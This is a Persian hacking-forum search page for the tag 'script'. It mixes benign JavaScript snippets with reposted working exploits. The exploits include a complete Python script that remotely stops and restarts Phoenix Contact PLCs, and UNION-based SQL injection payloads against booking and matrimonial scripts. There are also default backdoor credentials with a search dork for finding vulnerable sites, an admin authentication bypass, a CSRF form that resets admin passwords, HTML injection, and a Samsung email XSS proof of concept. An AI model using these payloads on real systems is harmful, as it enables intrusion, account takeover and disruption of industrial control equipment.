امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'script'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

دسته ها

  • Articles

22 نتیجه پیدا شد

  1. Hacking

    #! /usr/bin/env python ''' # Exploit Title: Phoenix Contact ILC 150 ETH PLC Remote Control script # Date: 2015-05-19 # Exploit Author: Photubias - tijl[dot]deneut[at]howest[dot]be # Vendor Homepage: https://www.phoenixcontact.com/online/portal/us?urile=pxc-oc-itemdetail:pid=2985330 # Version: ALL FW VERSIONS # Tested on: Python runs on Windows, Linux # CVE : CVE-2014-9195 Copyright 2015 Photubias(c) Written for Howest(c) University College This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. File name ControlPLC.py written by tijl[dot]deneut[at]howest[dot]be This POC will print out the current status of the PLC, continuously every 0.1 second, after 3 seconds it reverts (start becomes stop, stop becomes cold start), and stops after 5 seconds Works on ILC 15x ETH, partly on RFC 43x, partly on ILC 39x ''' import sys, socket, binascii, time, os, select, re IP='' infoport=1962 controlport=41100 ## Defining Functions First def send_and_recv(s,size,strdata): data = binascii.unhexlify(strdata) ## Convert to real HEX (\x00\x00 ...) s.send(data) ret = s.recv(4096) return ret def doAction(s,strdata): ret = send_and_recv(s,1000,strdata) # In official state these are send, they do not seem to be needed send_and_recv(s,1000,packet1) send_and_recv(s,1000,packet2) send_and_recv(s,1000,packet2) ret = send_and_recv(s,1000,'010002000000020003000100000000000840') send_and_recv(s,1000,packet2) return ret def initMonitor(s): send_and_recv(s,1000,'0100000000002f00000000000000cfff4164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c536572766963653200') send_and_recv(s,1000,'0100000000002e0000000000000000004164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c5365727669636500') send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446174614163636573735365727669636500') send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e49446576696365496e666f536572766963653200') send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446576696365496e666f5365727669636500') send_and_recv(s,1000,'0100000000002500000000000000d9ff4164652e52656d6f74696e672e53657276696365732e49466f726365536572766963653200') send_and_recv(s,1000,'010000000000240000000000000000004164652e52656d6f74696e672e53657276696365732e49466f7263655365727669636500') send_and_recv(s,1000,'0100000000003000000000000000ceff4164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653300') send_and_recv(s,1000,'010000000000300000000000000000004164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653200') send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e49446576696365496e666f536572766963653200') send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446576696365496e666f5365727669636500') send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e4944617461416363657373536572766963653300') send_and_recv(s,1000,'010000000000290000000000000000004164652e52656d6f74696e672e53657276696365732e49446174614163636573735365727669636500') send_and_recv(s,1000,'0100000000002a00000000000000d4ff4164652e52656d6f74696e672e53657276696365732e4944617461416363657373536572766963653200') send_and_recv(s,1000,'0100000000002900000000000000d5ff4164652e52656d6f74696e672e53657276696365732e49427265616b706f696e745365727669636500') send_and_recv(s,1000,'0100000000002800000000000000d6ff4164652e52656d6f74696e672e53657276696365732e4943616c6c737461636b5365727669636500') send_and_recv(s,1000,'010000000000250000000000000000004164652e52656d6f74696e672e53657276696365732e494465627567536572766963653200') send_and_recv(s,1000,'0100000000002f00000000000000cfff4164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c536572766963653200') send_and_recv(s,1000,'0100000000002e0000000000000000004164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c5365727669636500') send_and_recv(s,1000,'0100000000003000000000000000ceff4164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653300') send_and_recv(s,1000,'010000000000300000000000000000004164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653200') send_and_recv(s,1000,'0100020000000e0003000300000000000500000012401340130011401200') return def is_ipv4(ip): match = re.match("^(\d{0,3})\.(\d{0,3})\.(\d{0,3})\.(\d{0,3})$", ip) if not match: return False quad = [] for number in match.groups(): quad.append(int(number)) if quad[0] < 1: return False for number in quad: if number > 255 or number < 0: return False return True ##### The Actual Program if not len(sys.argv) == 2: IP = raw_input("Please enter the IPv4 address of the Phoenix PLC: ") else: IP = sys.argv[1] if not is_ipv4(IP): print "Please go read RFC 791 and then use a legitimate IPv4 address." sys.exit() ## - initialization, this will get the PLC type, Firmware version, build date & time s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((IP,infoport)) print 'Initializing PLC' print '----------------' code = send_and_recv(s,1000,'0101001a005e000000000003000c494245544830314e305f4d00').encode('hex')[34:36] send_and_recv(s,1000,'01050016005f000008ef00' + code + '00000022000402950000') ret = send_and_recv(s,1000,'0106000e00610000881100' + code + '0400') print 'PLC Type = ' + ret[30:50] print 'Firmware = ' + ret[66:70] print 'Build = ' + ret[79:100] send_and_recv(s,1000,'0105002e00630000000000' + code + '00000023001c02b0000c0000055b4433325d0b466c617368436865636b3101310000') send_and_recv(s,1000,'0106000e0065ffffff0f00' + code + '0400') send_and_recv(s,1000,'010500160067000008ef00' + code + '00000024000402950000') send_and_recv(s,1000,'0106000e0069ffffff0f00' + code + '0400') send_and_recv(s,1000,'0102000c006bffffff0f00' + code) s.shutdown(socket.SHUT_RDWR) s.close() print 'Initialization done' print '-------------------\r\n' print 'Will now print the PLC state and reverse it after 3 seconds' raw_input('Press [Enter] to continue') ########## CONTROL PHASE ####### Start monitoring with loop on port 41100 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((IP,controlport)) # First init phase (sending things like 'Ade.Remoting.Services.IProConOSControlService2' and 'Ade.Remoting.Services.ISimpleFileAccessService3', 21 packets) initMonitor(s) # Query packet packet1 = '010002000000080003000300000000000200000002400b40' # Keepalive packet packet2 = '0100020000001c0003000300000000000c00000007000500060008001000020011000e000f000d0016401600' ## The loop keepalive and query status loop (2 x keepalive, one time query): i = 0 state = 'On' running = 0 stopme = 0 startme = 0 while True: i += 1 time.sleep(0.1) ## Keep Alive send_and_recv(s,1000,packet2) send_and_recv(s,1000,packet2) ## Possible actions (like stop/start) should be sent now before the query state if (state == 'Running' and stopme): print 'Sending Stop' doAction(s,'01000200000000000100070000000000') startme = stopme = 0 elif (state == 'Stop' and startme): print 'Sending COLD Start' ## This is the COLD start: doAction(s,'010002000000020001000600000000000100') ## This is the WARM start: doAction(s,'010002000000020001000600000000000200') ## This is the HOT start: doAction(s,'010002000000020001000600000000000300') doAction(s,'010002000000020001000600000000000100') startme = stopme = 0 ## Query Status ret = send_and_recv(s,1000,packet1).encode('hex') if ret[48:50] == '03': state = 'Running' elif ret[48:50] == '07': state = 'Stop' elif ret[48:50] == '00': state = 'On' else: print 'State unknown, found code: '+ret.encode('hex')[48:50] print 'Current PLC state: '+state ## Maintaining the LOOP if i == 50: break # ''' if i == 30: if state == 'Running': stopme = 1 else: startme = 1 #''' raw_input('All done, press [Enter] to exit')
  2. ====================================================================================================================================== | # Title : MenorahMarket - Multi Vendor Digital Goods Market Place Script V 2.0 Backdoor Account Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : https://codecanyon.net/item/menorahmarket-multi-vendor-digital-goods-market-place-script/20195267 | | # Dork : "COPYRIGHTS 2017 ALL RIGHTS RESERVED BY - EDD MARKET PLACE" | ====================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] Use Admin : Owner: owner@owner.com / password Admin : admin@admin.com / password Executive : executive@executive.com / password Vendor : vendor@vendor.com / password Customer : user@user.com / password [+] Panel http://getup.market/home Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | | =======================================================================================================================================
  3. حفره Cross Site Script در پوسته پیشفرض Twenty Fifteen وردپرس DOM XSS Vulnerability in Twenty Fifteen WordPress Theme حفره Cross Site Script در یکی از پوسته های وردپرس که به صورت پیشفرض در تمامی سایت های وردپرسی نصب میباشد کشف شده است پوسته Twenty Fifteen ورژن 4.2.1 دارای باگ Xss میباشد که با این حفره میتوان اقدام به سرقت کوکی مدیر سایت نمود و کنترل سایت وردپرسی را در اختیار گرفت. حفره در قسمت wp-content/themes/twentyfifteen/genericons/
  4. Template Ready

    Snapshot ~ HTML5 , CSS3 , JS Demo : http://demo.moeein.ir/SnappHost-snapshot/ Download link : SnappHost-snapshot.zip - آپلود عکس و فایل رایگان
  5. Hacking

    # # # # # # Exploit Title: Readymade Video Sharing Script 3.2 - HTML Injection # Dork: N/A # Date: 13.12.2017 # Vendor Homepage: https://www.phpscriptsmall.com/ # Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/ # Demo: http://www.smsemailmarketing.in/demo/videosharing/ # Version: 3.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2017-17649 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability implication allows an attacker to inject html code .... # # Proof of Concept: # # 1) # http://localhost/[PATH]/single-video-detail.php?video_id=MTMy&comment=[CODE]&comment_submit= # # # # # # #
  6. Hacking

    <!-- # # # # # # Exploit Title: Bus Booking Script 1.0 - SQL Injection # Dork: N/A # Date: 13.12.2017 # Vendor Homepage: http://www.phpautoclassifiedscript.com/ # Software Link: http://www.phpautoclassifiedscript.com/bus-booking-script.html # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2017-17645 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: --> <html> <body> <form action="http://localhost/newbusbooking/admin/index.php" method="post" enctype="application/x-www-form-urlencoded" name="frmlogin" target="_self"> <input name="txtname" type="text" value="' UNION ALL SELECT 0x31,0x564552204159415249,0x33,0x34,0x35-- Ver Ayari"></div> <input name="logbut" id="logbut" type="submit"></div> </form> </body> </html>
  7. Hacking

    # # # # # # Exploit Title: Matrimonial Script - SQL Injection # Dork: N/A # Date: 22.08.2017 # Vendor Homepage: http://www.scubez.net/ # Software Link: http://www.mscript.in/ # Demo: http://www.mscript.in/matrimonial-demo.html # Version: N/A # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/viewprofile.php?id=[SQL] # # -MUS00053'+/*!11100uNiOn*/(/*!11100sElEct*/0x283129,0x3c48313e494853414e2053454e43414e3c2f48313e,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629,0x28323729,0x28323829,0x28323929,0x28333029,0x28333129,0x28333229,0x28333329,0x28333429,0x28333529,0x28333629,0x28333729,0x28333829,0x28333929,0x28343029,0x28343129,0x28343229,0x28343329,0x28343429,0x28343529,0x28343629,0x28343729,0x28343829,0x28343929,0x28353029,0x28353129,0x28353229,0x28353329,0x28353429,0x28353529,0x28353629,0x28353729,0x28353829,0x28353929,0x28363029,0x28363129,0x28363229,0x28363329,0x28363429,0x28363529,0x28363629,0x28363729,0x28363829,0x28363929,0x28373029,0x28373129,0x28373229,0x28373329,0x28373429,0x28373529,0x28373629,0x28373729,0x28373829,0x28373929,0x28383029,0x28383129,0x28383229,0x28383329,0x28383429,0x28383529,0x28383629,0x28383729,0x28383829,0x28383929,0x28393029,0x28393129,0x28393229,0x28393329,0x28393429,0x28393529,0x28393629,0x28393729,0x28393829,0x28393929,0x2831303029,0x2831303129,0x2831303229,0x2831303329,0x2831303429,0x2831303529,0x2831303629,0x2831303729,0x2831303829,0x2831303929,0x2831313029,0x2831313129,0x2831313229,0x2831313329,0x2831313429,0x2831313529,0x2831313629,0x2831313729,0x2831313829,0x2831313929,0x2831323029,0x2831323129,0x2831323229,0x2831323329,0x2831323429,0x2831323529,0x2831323629,0x2831323729,0x2831323829,0x2831323929,0x2831333029,0x2831333129,0x2831333229,0x2831333329,0x2831333429,0x2831333529,0x2831333629,0x2831333729,0x2831333829,0x2831333929,0x2831343029,0x2831343129,0x2831343229,0x2831343329,0x2831343429,0x2831343529,0x2831343629,0x2831343729,0x2831343829,0x2831343929,0x2831353029,0x2831353129,0x2831353229,0x2831353329,0x2831353429,0x2831353529,0x2831353629,0x2831353729,0x2831353829,0x2831353929,0x2831363029,0x2831363129,0x2831363229,0x2831363329,0x2831363429,0x2831363529,0x2831363629,0x2831363729,0x2831363829,0x2831363929,0x2831373029,0x2831373129,0x2831373229,0x2831373329,0x2831373429,0x2831373529,0x2831373629,0x2831373729,0x2831373829,0x2831373929,0x2831383029,0x2831383129,/*!50000dataBase*/(),0x2831383329)--+- # # http://localhost/[PATH]/load_caste_state_city.php?list_type=caste&&parent_id=[SQL] # # -1+/*!22255union*/+/*!22255+sElEct*/+0x31,(/*!22255+sElEct*/+eXpoRt_Set(5,@:=0,(/*!22255+sElEct*/+count(*)fROm(iNformatiOn_sChemA.colUmns)/*!22255where*/@:=eXpoRt_Set(5,eXpoRt_Set(5,@,table_name,0x3c6c693e,2),cOlumN_naMe,0xa3a,2)),@,2)),0x33--+- # # http://localhost/[PATH]/printprofile.php?id=[SQL] # http://localhost/[PATH]/viewphoto.php?id=[SQL] # http://localhost/[PATH]/advsearch_results.php?gender=[SQL] # http://localhost/[PATH]/advsearch_results.php?age1=[SQL] # http://localhost/[PATH]/advsearch_results.php?age2=[SQL] # http://localhost/[PATH]/advsearch_results.php?religion=[SQL] # http://localhost/[PATH]/advsearch_results.php?caste=[SQL] # http://localhost/[PATH]/advsearch_results.php?ms=[SQL] # http://localhost/[PATH]/advsearch_results.php?language=[SQL] # http://localhost/[PATH]/advsearch_results.php?edu=[SQL] # http://localhost/[PATH]/advsearch_results.php?occu=[SQL] # http://localhost/[PATH]/advsearch_results.php?country=[SQL] # # Etc.. # # # # #
  8. Hacking

    # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # <!-- # Exploit Title: Matrimonial Script 2.7 - Admin panel Authentication bypass # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer # Dork: N/A # Date: 27.08.2017 # Vendor Homepage: http://www.scubez.net/ # Software Link: http://www.mscript.in/ # Version: 2.7 # Category: Webapps # Tested on: windows 7 / mozila firefox # supporting tools for testing : No-Redirect Add-on in firefox # --!> # ======================================================== # # # admin panel Authentication bypass # # Description : An Attackers are able to completely compromise the web application built upon # Matrimonial Script as they can gain access to the admin panel and manage the website as an admin without # prior authentication! # # Proof of Concept : - # Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php # Step 2: Access http://example.com/path/admin/index.php # # # Risk : Unauthenticated attackers are able to gain full access to the administrator panel # and thus have total control over the web application, including content change,add admin user .. etc # # # # # ======================================================== # [+] Disclaimer # # Permission is hereby granted for the redistribution of this advisory, # provided that it is not altered except by reformatting it, and that due # credit is given. Permission is explicitly given for insertion in # vulnerability databases and similar, provided that due credit is given to # the author. The author is not responsible for any misuse of the information contained # herein and prohibits any malicious use of all security related information # or exploits by the author or elsewhere. # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
  9. # # # # # # Exploit Title: Advertiz PHP Script 0.2 - Cross-Site Request Forgery (Update Admin User&Pass) # Dork: N/A # Date: 06.09.2017 # Vendor Homepage: http://www.dijiteol.com/ # Software Link: http://www.dijiteol.com/p-Advertiz-PHP-Script--No-Accounts-Required--i-2.html # Demo: http://dijiteol.com/demos/advertiz/ # Version: 0.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # # Proof of Concept: <html> <body> <form method="post" action="http://localhost/[PATH]/admin/editpersonal.php"> <!--Change admin username--> <input name="login" type="text" size="20" maxlength="15" value="admin"> <!--Change admin password--> <input name="pass" type="text" class="keyboardInput" size="20" maxlength="15" value="efe"> <input type="submit" name="Submit" value="Update"> </form> </body> </html> # # # # #
  10. Hacking

    # Source: https://code.google.com/p/google-security-research/issues/detail?id=494 ''' The default Samsung email client's email viewer and composer (implemented in SecEmailUI.apk) doesn't sanitize HTML email content for scripts before rendering the data inside a WebView. This allows an attacker to execute arbitrary JavaScript when a user views a HTML email which contains HTML script tags or other events. At the very least the JavaScript could exploit the attack surface provided within the WebView control. It might also be possible to access local file content or emails depending on the full configuration of the WebView, although this hasn't been tested fully. This can also be exploited locally with the com.samsung.android.email.intent.action.QUICK_REPLY_BACKGROUND intent which will include attacker controlled HTML in the sending email. If the final message was viewed it would be possible for the script to extract the original message from the Document object and potentially post that information to another server. Attached is a simple SMTP client in Python to send an HTML message with script contents to the device. The "me", "you", "me_password" and "smtp_server" variables need to be changed to ones appropriate for the sending email account and the receiving account on the phone. When the resulting email is viewed it should display the URL of the page which is of the form email://M/N where M is the email account ID and N is the message ID which proves that the script code executed. ''' #!/usr/bin/env python import smtplib from email.mime.multipart import MIMEMultipart from email.mime.text import MIMEText # Change the details here appropriate to your configuration me = "attacker@gmail.com" me_password = "THIS IS NOT REAL" you = "project.zero.test@gmail.com" smtp_server = "smtp.gmail.com" msg = MIMEMultipart('alternative') msg['Subject'] = "Hello There!" msg['From'] = me msg['To'] = you text = "Hello There!" html = """\ <html> <head></head> <body> <p> <script>try { document.write(document.location); } catch(e) { document.write(e.message); }</script> </p> </body> </html> """ part1 = MIMEText(text, 'plain') part2 = MIMEText(html, 'html') msg.attach(part1) msg.attach(part2) s = smtplib.SMTP_SSL(smtp_server) s.login(me, me_password) s.sendmail(me, you, msg.as_string()) s.quit()
  11. Programming-JS

    باسلام.معین سون هستم با آموزش یادگیری سریع و آسان jquery در خدمتتان هستم . فایل به صورت pdf است . رمز فایل www.anonysec.org موفق باشید لایک فراموش نشه
  12. Programming-JS

    Node.js یک پلتفرم بر اساس موتور جاوا اسکریپت گوگل V8 است. Node.js برای ساخت سریعتر و مقیاس پذیرتر اپلیکیشن های تحت شبکه می باشد. Node.jsیک پلتفرم بر اساس موتور جاوا اسکریپت گوگل V8 است. Node.js برای ساخت سریعتر و مقیاس پذیرتر اپلیکیشن های تحت شبکه می باشد.این پلتفرم از تکنولوژی non-blocking I/O که یک تکنولوژی event-driven به جای استفاده از روش سنتی Treading است. در زبان های سمت سرور موجود مانند java ,PHP هر کاربری که به سرور متصل می شود یک threadبه ازای آن کاربر به وجود می آید.اگر تعداد اتصال های همزمان افزایش یابد ناچار به افزایش منابع مانند حافظه RAM و افزایش سرور های موجود خواهیم بود که این به نوبه خود سبب افزایش هزینه ها خواهد شد. Node.js این مشکل را به وسیله نحوه تغییر اتصال به سرور حل می کند.در این روش هر اتصال به صورت یک رویداد اجرا می شود و نه به صورت یک thread. Node.js یک پلتفرم سمت سرور است که بر مبنای موتور جاوا اسکریپتی گوگل موسوم بهV8ایجاد شده و به شما امکان می‌دهد که با کمکjavascriptبرای سمت سرور برنامه بنویسید و فقط یکthreadایجاد کنید و تمام درخواست‌ها را به صورت رویداد(event)مدیریت کنید درست مثل مدیریتeventها در جاوا اسکریپت موتور جاوااسکریپت V8 V8 به زبان C++ نوشته شده است و توسط اسکریپت ECMA پیاده سازی شده است. یک موتور جاوااسکریپت کدهای جاوا اسکریپت را پردازش می کندو انها را اجرا می کند. در گوگل کروم استفاده می شود ولی می تواند به صورت مستقل نیز به کار برده شود.شما می توانید V8 را دانلود و در هر برنامه ای که میخواهید جاوا اسکریپت در آن اجرا شود قرار دهیدو به یک مرورگر محدود نمی شود.و در سایر سیستم عامل ها مانند Windows XP, Vista, Windows7+, Mac OS X 10.5+, and Linux OSنیز اجرا می شود V8 از کامپایلر JIT برای اجرای کدهای جاوا اسکریپت استفاده می کند. بر اساس تعریف ویکی پدیا ، V8 کدهای جاوا اسکریپت را قبل از اجرا به زبان ماشین تبدیل می کند. Node.js همچنین برای اپلیکیشن های موبایل که اساسا به API Server برای سرویس دادن به درخواست های همزمان وابسته است ، ایده آل می باشد. Node.js Application Area پلتفرم Node.js می تواند برای ساخت اپلیکیشن هایی مانند موارد زیر به کار آید: 1-تجارت الکترونیک 2- شبکه های اجتماعی 3- سرویس های بلادرنگ 4-جریان داده ها چه برنامه هایی از Node.js استفاده کرده اند؟ Walmart/E-bay / PayPal/Microsoft/LinkedIn/Yahoo/Google توجه Node.jsیک کتابخانه از جاوا اسکریپت نیست بلکه یک پلتفرم است که جاوااسکریپت را سمت سرور اجرا می کند. اپلیکیشن های نود بر روی هاست موجود شما نمی توانند اجرا شوند شما می توانید از VPS و سرروهای مشخص برای نصب نود و اجرای برنامه خود استفاده کنید. راحت ترین روش برای گسترش اپلیکیشن Nodeاستفاده از سرویس های مقیاس پذیر مانند Heroku که کاملا رایگان هستند، می باشد.
  13. Programming-JS

    با سلام دکتر ارور هستم دوره اموزشی جاوا اسکریپت در لحظاتی دیگر ...!
  14. Programming-JS

    <form action=""> <input type=button value="???? ????" onClick="javascript:window.close();" style="margin:10; padding:7;cursor: pointer;border-radius:5px;font:11px tahoma;text-shadow:1px 1px 0 #fff; border:1px #ccc solid;background: #ffffff;background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#ffffff), color-stop(100%,#e5e5e5));"> </form> لایک فراموش نشه
  15. Programming-JS

    <html> <head> کد زیر را در هد قالب قرار دهید <link rel="stylesheet" href="http://s9.picofile.com/file/8296163018/style_1.css.html"> <link rel="stylesheet" href="http://s8.picofile.com/file/8296163150/style_2.css.html"> </head> <body> کد زیر را در بادی قالب قرار دهید <div id="container" > <header class="t-hotel-p-header"> <a class="menu ir" href="#"></a> <a class="menu ir on" href="#container"></a> </header> <style> #container:target nav.t-hotel-p-menu.acor { height: 224px; } </style> <nav class="t-hotel-p-menu acor"> <ul class="buttom" id="menu" > <li class=""><a href="http://www.skinak.ir" class="menu">اسکینک</a></li> <li class=""><a href="http://www.anonysec.org" class="menu">anonysec</a></li> <li class=""><a href="http://www.anonysec.org" class="menu">anonysec</a></li> <li class=""><a href="http://www.anonysec.org" class="menu">anonysec</a></li> <li class=""><a href="http://www.anonysec.org" class="menu">anonysec</a></li> </ul> </nav> </body> </html> لایک فراموش نشه
  16. Programming-JS

    <!-- anonysec.org --> <SCRIPT> document.onkeypress = function (event) { event = (event || window.event); if (event.keyCode == 123) { //alert('No F-12'); return false; } } document.onmousedown = function (event) { event = (event || window.event); if (event.keyCode == 123) { //alert('No F-keys'); return false; } } document.onkeydown = function (event) { event = (event || window.event); if (event.keyCode == 123) { //alert('No F-keys'); return false; } } var message="Sorry, right-click has been disabled"; function clickIE() {if (document.all) {(message);return false;}} function clickNS(e) {if (document.layers||(document.getElementById&&!document.all)) { if (e.which==2||e.which==3) {(message);return false;}}} if (document.layers) {document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;} else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;} document.oncontextmenu=new Function("return false") // function disableCtrlKeyCombination(e) { //list all CTRL + key combinations you want to disable var forbiddenKeys = new Array('a', 'n', 'z', 'c', 'x', 'v', 'j' , 'w', 'u'); var key; var isCtrl; if(window.event) { key = window.event.keyCode; //IE if(window.event.ctrlKey) isCtrl = true; else isCtrl = false; } else { key = e.which; //firefox if(e.ctrlKey) isCtrl = true; else isCtrl = false; } //if ctrl is pressed check if other key is in forbidenKeys array if(isCtrl) { for(i=0; i<forbiddenKeys.length; i++) { //case-insensitive comparation if(forbiddenKeys[i].toLowerCase() == String.fromCharCode(key).toLowerCase()) { return false; } } } return true; } </script>
  17. <!-- www.anonysec.org --> <SCRIPT language=javascript> function noRightClick() { if (event.button==2) { alert('پیغام شما') } } document.onmousedown=noRightClick </SCRIPT> *نکته : به جای "پیغام شما" شما میتوانید متنی که میخواهید برای کاربر نمایش داده شود را بنویسید* ***این کد f12 را نمیبندد و تنها از راست کلیک جلوگیری میکند.***
  18. <!-- www.anonysec.org --> <script type="text/JavaScript"> var deviceIsMobile = false; if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|ipad|iris|kindle|Android|Silk|lge |maemo|midp|mmp|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows (ce|phone)|xda|xiino/i.test(navigator.userAgent) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v 